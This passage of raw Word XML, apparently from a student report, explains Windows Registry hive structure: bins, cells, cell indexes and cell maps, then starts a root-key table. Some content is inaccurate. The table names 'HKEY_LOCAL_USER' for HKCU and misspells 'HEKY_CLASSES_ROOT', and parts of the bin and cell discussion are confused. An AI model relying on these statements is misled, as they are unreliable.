        <w:t>A bin is the size of the new cell rounded up to the next block boundary. The system considers any space between the end of the cell and the end of the bin free space that it can allocate to other cells. Bins also have headers that contain</w:t>
      </w:r>
      <w:r w:rsidR="00A432FD">
        <w:t xml:space="preserve"> a signature called</w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A432FD">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
        <w:t>hbin</w:t>
      </w:r>
      <w:r w:rsidR="00A432FD">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
        <w:t xml:space="preserve"> and a field that records the offset into the hive file of the bin and the bin's size.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00F41346" w:rsidP="00FA40B2">
      <w:r>
        <w:t xml:space="preserve">Using bin instead of cells to track active parts of the Registry, system can reduce the management overheads. The question is why using bins makes system run smoother than cells? For answering that question, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> identify that cell is a build in unit in Registry hive, but bin is an addon unit in case the hive wants to expand</w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t xml:space="preserve"> its size then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t>cells are contained</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the hive, but bins are not. When Configuration Manager allocates or deallocates bins, nothing changes in the hive. However, </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t>when Configuration Manager empties</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a cell in registry hive, it creates an empty bin in the hive, the hive is now fragmented </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t xml:space="preserve">and leads to the fragmentation of the </w:t>
      </w:r>
      <w:r>
        <w:t>registry. Fragmentation can slow down read and write processes</w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> makes the system run slower. </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t>When a bin becomes empty, the Configuration Manager adjacent that bin and other empty bins to a large empty bin, and make it as contiguous as possible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t>Configuration Manager also joins empty cells to become larger empty cells.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA40B2" w:rsidRDefault="002C43F1" w:rsidP="00FA40B2">
      <w:r w:rsidRPr="002C43F1">
        <w:t xml:space="preserve">The links that create the structure of a hive are cell indexes. A cell index is the offset into the hive file of a cell. Thus, a cell index is like a pointer from one cell to another cell that the Configuration Manager interprets relative to the start of a hive. For example, a cell that describes a key contains a field specifying the cell index of its </w:t>
      </w:r>
      <w:r w:rsidRPr="002C43F1">
        <w:lastRenderedPageBreak/>
        <w:t>parent key; a cell index for a subkey specifies the cell that describes the subkeys that are subordinate to the specified subkey. A subkey-list cell contains a list of cell indexes that refer to the subkey's key cells.</w:t>
      </w:r>
      <w:r w:rsidR="00BB3774">
        <w:t xml:space="preserve"> When we want to locate a key that is a subkey belongs to a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BB3774">
        <w:t>particular key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BB3774">
        <w:t>, we have to locate the cell containing that key’s subkey lists using the subkey-list cell. For each subkey cell, we check the subkey’s name to fine the one we want to locate.</w:t>
      </w:r>
      <w:r w:rsidR="00E05464">
        <w:t xml:space="preserve"> Let’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E05464">
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E05464">
        <w:t xml:space="preserve"> at figure 2.3 default for an example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E05464" w:rsidRDefault="00E05464" w:rsidP="00E05464">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71881184" wp14:editId="2DC28570">
            <wp:extent cx="5581650" cy="4785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1650" cy="4785360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E05464" w:rsidRPr="00AB2F74" w:rsidRDefault="00E05464" w:rsidP="00AB2F74">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc483834779"/>
      <w:bookmarkStart w:id="41" w:name="_Toc484886343"/>
      <w:r w:rsidRPr="00AB2F74">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AB2F74">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example of cell indexes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00E05464" w:rsidRPr="00E05464" w:rsidRDefault="00E05464" w:rsidP="00E05464">
      <w:r>
        <w:t xml:space="preserve">Consider that we have a parent key and we want to allocate its subkey. First, we find the parent key’s subkey-list cell which is a cell contained in the hive of the parent key. The subkey-list cell could contain many cell-indexes those point to other </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>key-cell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cell of other keys, those are subkey of the current parent key. Suppose that we would like to find subkey A, we locate the cell-index that point to the key-cell cell of a subkey, then check the cell-index that point to a cell containing its name. If the name is A, we have located our subkey correctly, if it is not, we do these steps</w:t>
      </w:r>
      <w:r w:rsidR="00592005">
        <w:t xml:space="preserve"> repeatedly for other cell indexes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> again we find our subkey.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E73C40" w:rsidRDefault="00BC587C" w:rsidP="00FA40B2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The concept of hive, block, cell and bin might be comp</w:t>
      </w:r>
      <w:r w:rsidR="005C63B5">
        <w:t xml:space="preserve">licated and undistinguishable. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007235C2">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ake a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at figure 2.2 above, we see an </w:t>
      </w:r>
      <w:r w:rsidR="00DA04E1">
        <w:t>entire long square that contains main smaller square. This long square is a registry hive. A hive contains some blocks inside it. A square that is defined by two</w:t>
      </w:r>
      <w:r w:rsidR="00AB2F74">
        <w:t xml:space="preserve"> contiguous</w:t>
      </w:r>
      <w:r w:rsidR="00DA04E1">
        <w:t xml:space="preserve"> dash lines is a block</w:t>
      </w:r>
      <w:r w:rsidR="00AB2F74">
        <w:t xml:space="preserve"> with a fix length of 4096 bytes. The first block of a hive is call a base block, which stores global information for that hive. The free space which is</w:t>
      </w:r>
      <w:r w:rsidR="00E73C40">
        <w:t xml:space="preserve"> the block next to the base block is an empty bin. The next second blocks compose a bin, that bin consists of many cells. A free space within that bin is an empty cell (or a smaller empty bin). Bin is just a concept, a bin in general is not an object with a specific location and fix length.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2F74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E73C40">
        <w:t>From a hive perspective, a bin is an allocation unit that stores cells, and those cells can be allocated or free (which can also be called an empty bin).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E05464" w:rsidRPr="00E73C40" w:rsidRDefault="00E73C40" w:rsidP="00FA40B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73C40">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cell Maps</w:t>
      </w:r>
      <w:r w:rsidR="00DA04E1" w:rsidRPr="00E73C40">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00577F94" w:rsidRDefault="000C11BF" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F11BB5">
        <w:t>Since when the system accesses the disk, the overhead for that process is much expensive compare to the outcome speed of these tasks. Configuration Manager decides not to access a hive’s image on disk every time it want to access the Registry. To finish this object, system stores a version of every hive in the kernel’</w:t>
      </w:r>
      <w:r w:rsidR="00577F94">
        <w:t>s address space</w:t>
      </w:r>
      <w:r w:rsidR="00F11BB5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00577F94">
        <w:t xml:space="preserve"> When initializing a hive, Configuration Manager calculates the size of the hive and allocates enough memory from the kernel’s paged pool to store the hive file, and reads the hive file into memory. “</w:t>
      </w:r>
      <w:r w:rsidR="00577F94" w:rsidRPr="00577F94">
        <w:t>The paged pool is a portion of the kernel's address map that NT reserves for device drivers and the kernel to use. NT can move any memory the system allocates from the paged pool to a paging file when the memory isn't in use. If hives never grew, the Configuration Manager could perform all its Registry management on the in-memory version of a hive as if the hive were a file.</w:t>
      </w:r>
      <w:r w:rsidR="00577F94">
        <w:t>”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1017196930"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00577F94">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00577F94">
            <w:instrText xml:space="preserve"> CITATION Mic97 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00577F94">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00577F94">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> (6)</w:t>
          </w:r>
          <w:r w:rsidR="00577F94">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00C500CD" w:rsidRDefault="00577F94" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve">With a cell index, Configuration Manager can calculate the location of a cell by adding the cell index to the base of the in-memory hive image. This is the task of “Ntldr” (Abbreviation for “NT Loader”) does with the SYSTEM hive when the system boots. When the system boots, Ntldr reads entire SYSTEM hive and load it </w:t>
      </w:r>
      <w:r w:rsidR="00C500CD">
        <w:t xml:space="preserve">into memory as a read-only hive, then adds the cell index to the base of the in-memory hive image to locate the cells. However, hives growth by size when they have more subkeys and values added to them, that leads to the system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C500CD">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C500CD">
        <w:t xml:space="preserve"> allocate paged pool memory to store the new bins. Therefore, the paged pool that keeps the Registry data is not necessary to be contiguous.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D370AF" w:rsidRDefault="00D370AF" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve">For handling the problem of noncontiguous memory buffers those store the hive data, Configuration Manager applies the strategies that Memory Manager does for mapping virtual address space to physical memory addresses </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1456295992"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION Mic14 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(8)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00577F94">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The Configuration Mana</w:t>
      </w:r>
      <w:r w:rsidR="00ED091A">
        <w:t xml:space="preserve">ger employs a two-level scheme </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that takes as input a cell index and returns both the address in memory of the block the cell index resides in and the address in memory of the bin the cell resides in. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRDefault="00D370AF" w:rsidP="000C11BF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 2. describes the process that Configuration Manager handling the </w:t>
      </w:r>
      <w:r w:rsidR="00AD10D8">
        <w:t>noncontiguous memory buffer problems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRDefault="00AD10D8" w:rsidP="00AD10D8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4783240" cy="2377440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="10" name="Picture 10" descr="cc750583.inreg02_big(l=en-us).gif (46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750583.inreg02_big(l=en-us).gif (461×2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2491" cy="2416831"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRPr="00AD10D8" w:rsidRDefault="00AD10D8" w:rsidP="00AD10D8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc483834780"/>
      <w:bookmarkStart w:id="43" w:name="_Toc484886344"/>
      <w:r w:rsidRPr="00AD10D8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AD10D8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configuration Manager implements a strategy for handling noncontiguous memory buffer problems.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRPr="00AD10D8" w:rsidRDefault="00AD10D8" w:rsidP="00AD10D8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD10D8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00AD10D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRDefault="00AD10D8" w:rsidP="00AD10D8">
      <w:r w:rsidRPr="00AD10D8">
        <w:t>To implement the mapping, the Configuration Manager divides a cell index logically into fields, in the same way that the Memory Manager divides a virtual address into fields. NT interprets a cell index's first field as an index into a hive's cell map directory. The cell map directory contains 1024 entries, each of which refers to a cell map table that contains 512 map entries. The second field in the cell index specifies the entry in the cell map table that the first index field identified. That entry locates the bin and block memory addresses of the cell. In the final step of the translation process, the Configuration Manager interprets the last field of the cell as an offset into the identified block to precisely locate a cell in memory. When a hive initializes, the Configuration Manager dynamically creates the mapping tables, designating a map entry for each block in the hive, and adds and deletes tables from the cell directory as the changing size of the hive requires.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525B3D" w:rsidRPr="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="00AD10D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00525B3D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Registry Namespace and Operation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680540" w:rsidRPr="00525B3D" w:rsidRDefault="008E4183" w:rsidP="00AD10D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Root K</w:t>
      </w:r>
      <w:r w:rsidR="00525B3D" w:rsidRPr="00525B3D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>eys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve">A registry key that lying at the top level of a hive is called a root key, all root keys have a prefix of “HKEY” </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-590079721"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Mic3 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(9)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. Each root key points to a specific hive that have an essential job to the system operation. Root keys and their descriptions are shown in the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3380"/>
        <w:gridCol w:w="5390"/>
      </w:tblGrid>
      <w:tr w:rsidR="00525B3D" w:rsidTr="004B1D3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRPr="004B1D3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1D3D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Root key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRPr="004B1D3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1D3D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_LOCAL_USER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00525B3D">
              <w:t>Contains the root of the configuration information for the user who is currently logged on. The user's folders, screen colors, and Control Panel settings are stored here. This information is associated with the user's profile. This key is sometimes abbreviated as "HKCU."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_USERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve">Contains all the actively loaded user profiles on the computer. HKEY_CURRENT_USER is a subkey of HKEY_USERS. HKEY_USERS </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00525B3D">
              <w:t>is</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve"> sometimes abbreviated as "HKU."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_LOCAL_MACHINE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve">Contains configuration information </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00525B3D">
              <w:t>particular to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve"> the computer (for any user). This key is sometimes abbreviated as "HKLM."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HEKY_CLASSES_ROOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
